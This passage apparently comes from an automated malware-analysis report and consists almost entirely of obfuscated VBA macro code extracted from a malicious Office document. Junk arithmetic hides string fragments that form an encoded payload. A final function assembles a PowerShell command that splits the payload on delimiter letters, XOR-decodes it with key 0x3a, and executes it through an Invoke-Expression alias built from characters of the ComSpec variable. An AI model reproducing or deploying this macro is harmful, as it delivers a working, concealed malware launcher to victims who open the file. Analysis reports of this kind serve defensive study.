vABTwk = CDbl(UBYmB * CDbl(FwEOi + Int(TjfErG * Rnd(25968)) * PvqdIM * Log(97822 * FprIj - tWJzd + Fix(51))))
DPwJMi = CDbl(IYLvi)
hjiTC = qdRUD
XBvPdmQUW = "1<10t1" + "1t9m3G19F1K30%" + "120<87%117%73F" + "112F87F26%" + "7%26m30t9" + "5K84G76G0C"
RrFaI = Tan(30428)
KlGJbp = Tan(52308)
wdNdAi = ErVbR
wSXrSd = CDbl(QFBPi * CDbl(QBPkF + Int(NWGii * Rnd(85389)) * WZRzjb * Log(80000 * noljX - JilHQw + Fix(51))))
OrjpzW = CDbl(szGUn)
vrIjfa = sUKOSn
KmWDWjwJX = "78m95<87m7" + "4G26<17%26C" + "29K102K29t2" + "6A17C26G30G91" + "m113" + "<127t104K108" + "%9"
FszpAZ = Tan(29643)
tEiLYY = Tan(22427)
FDjwbk = ILIhKZ
CDndca = CDbl(KVWWIX * CDbl(dCKnh + Int(cdnhIh * Rnd(29423)) * OnMppo * Log(87188 * QEjwwA - oYwYhX + Fix(51))))
UvLsw = CDbl(KjSjJn)
KvEwk = qQffm
VBruYajs = "9%26" + "C17u26<29G20" + "F95A66<95%29K1" + "u92K" + "85G72<95t91C89%" + "82C18<30A91" + "F109u"
KsjWc = Tan(58034)
TsznUa = Tan(21006)
KKhJB = vNnTo
NrZoPz = CDbl(mdhWz * CDbl(oTvpMa + Int(PwsWY * Rnd(42458)) * iTIbW * Log(65100 * iIOfKN - BJYiLn + Fix(51))))
QzCQt = CDbl(aSUGzS)
onGELd = doYjDA
YzWYcZpLc = "64" + "<80G96%77" + "u26G83%84<2" + "6<30<83K112A94t" + "121A89G19m65<7" + "8A72F67A65A30K1" + "19m64u74G98" + "%78K" + "20A126u85A77"
GOzqt = Tan(32344)
iNYaZ = Tan(8693)
DzicuS = tMLYZi
tbtzLZ = CDbl(QjLdf * CDbl(DKSCr + Int(BFOFwB * Rnd(43064)) * kfuizA * Log(11344 * HUYPA - iUtkdw + Fix(51))))
fVwzof = CDbl(kojdiI)
DFNJLP = hAioS
XqCUNUoLwnY = "K84A86<85u" + "91F94C12" + "4G83<86G9" + "5t18t30G91F1" + "09K64u80G96K7" + "7C20C110<8" + "5%105%78m72" + "t83t84G93C18m19" + "u22%26m"
TiDIjk = Tan(82025)
QzoFkc = Tan(77339)
NTRJE = qnBqAZ
TOzwB = CDbl(JlZPwG * CDbl(qsYuf + Int(SaDBZS * Rnd(65999)) * zEZkF * Log(51254 * dZGlbC - mBLYsY + Fix(51))))
MZjTX = CDbl(jzirf)
XaaVzt = MGwocD
VwvrSuRFwEA = "30F12" + "0u87K117" + "t73A112C87C1" + "9u1K105K78C91m" + "72K78C23%" + "106F72A85<89F9" + "5K73u73A26u" + "30G1" + "20F87%117" + "A73K112A87G1C8"
fovXiP = Tan(43768)
YfWVc = Tan(48937)
DwFDi = uFBPdF
cAQuE = CDbl(uCOWYG * CDbl(zdKiC + Int(qLAGl * Rnd(8210)) * NYiAJT * Log(24890 * wfFbX - vFwqHw + Fix(51))))
bufqIa = CDbl(UOMFt)
INNjFI = SFBjhM
hPliMHUEV = "8u72A" + "95m91u81C1F7" + "1u89" + "%91A" + "78<89t82<65m77"
ETmDz = Tan(92777)
ikmdfE = Tan(81122)
ckGmrk = BjoOpI
ubppU = CDbl(jblafC * CDbl(Ksmilh + Int(DqjOf * Rnd(35127)) * UVURl * Log(50707 * DGuzIf - ObtFX + Fix(51))))
CEsbK = CDbl(jPFRJ)
UkZkP = ZlkdC
Aikkadwh = "C72K83A" + "78G95G23u8" + "2C85A73C78F26" + "C30K1"
JKzkXX = Tan(81646)
SKAiR = Tan(34602)
lwVojL = jzwJzD
uPzhv = CDbl(WuUNp * CDbl(SCjYO + Int(zrEDn * Rnd(14472)) * ZwVFb * Log(62261 * EzNDM - nzvuD + Fix(51))))
LtGrbq = CDbl(WTBps)
YzzNSm = wEIKk
lZOcRrw = "01t20A127G66G89" + "K95C74u78A8" + "3<85K84t20" + "C119%95<73A73m9"
UaowD = Tan(32360)
OZOzhl = Tan(90299)
CnzlRt = ZkpCL
LivrL = CDbl(CLzzrY * CDbl(uzFEHH + Int(tniTFp * Rnd(69257)) * TDEoA * Log(49792 * uSGWp - jOtdCd + Fix(51))))
YAclWL = CDbl(susDYS)
LqVbWK = jtFKC
EdjBt = "1u93K95" + "G1<71<71'-sPLi" + "T'F" + "'-sPLI" + "t '<'-splIT" + " '"
KhzDtEKMFr = XBvPdmQUW + KmWDWjwJX + VBruYajs + YzWYcZpLc + XqCUNUoLwnY + VwvrSuRFwEA + hPliMHUEV + Aikkadwh + lZOcRrw + EdjBt
End Function
Function UaQapXtui()
On Error Resume Next
mVooOI = Tan(78859)
zsOGl = Tan(67956)
HuHsSd = jcuswB
YRnqM = CDbl(XRzPnj * CDbl(smzfm + Int(pXNIw * Rnd(56613)) * nkYFkO * Log(46685 * ufFXt - LdifCk + Fix(51))))
LJqNaw = CDbl(tuiYLJ)
iuqUzi = oTAai
MmjozAFw = "%'-S" + "plit'a' -S" + "PL" + "iT 'm' -SPlIT '" + "T'-spLIt 'k'"
BaGrK = Tan(95692)
kQVFj = Tan(25440)
kXTtI = EcHwM
ujVqL = CDbl(chwUiz * CDbl(JdITb + Int(OlfzZR * Rnd(8443)) * zcPSR * Log(24242 * pkAOX - GoSpo + Fix(51))))
acOivZ = CDbl(icEjC)
VOKSBY = jAiZfo
XlOYwE = "-sPliT'g'-s" + "PLiT'" + "u' -SPlI" + "T'C'" + "|F" + "oReaCH-objEC" + "T{[CH" + "AR] ($_-bXOr"
btdMl = Tan(88848)
kNDjt = Tan(70679)
SbFBRi = DScFA
mncTdH = CDbl(iGtFS * CDbl(CaKLDz + Int(Ubhdwz * Rnd(85408)) * DOordN * Log(51340 * IuZcj - wbdTr + Fix(51))))
KGwUd = CDbl(VirFO)
UjmXa = EpQki
wbHmTbNjT = Chr(34) + "0x3a" + Chr(34) + ")" + " }) -jOiN''|&" + " ( $EnV:ComSpE" + "C[4,15,25]-JOin"
EBAsH = Tan(44959)
HTPJkb = Tan(11799)
nYLCik = NVcdf
ZzVrMi = CDbl(qzhAw * CDbl(VvFUGd + Int(GVLrr * Rnd(83555)) * JtvVjl * Log(1882 * WuSYtr - ziNLja + Fix(51))))
liAVA = CDbl(zCLRN)
zQOKZw = KWGWP
UzsOXpjAo = "'')"
UaQapXtui = MmjozAFw + XlOYwE + wbHmTbNjT + UzsOXpjAo
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.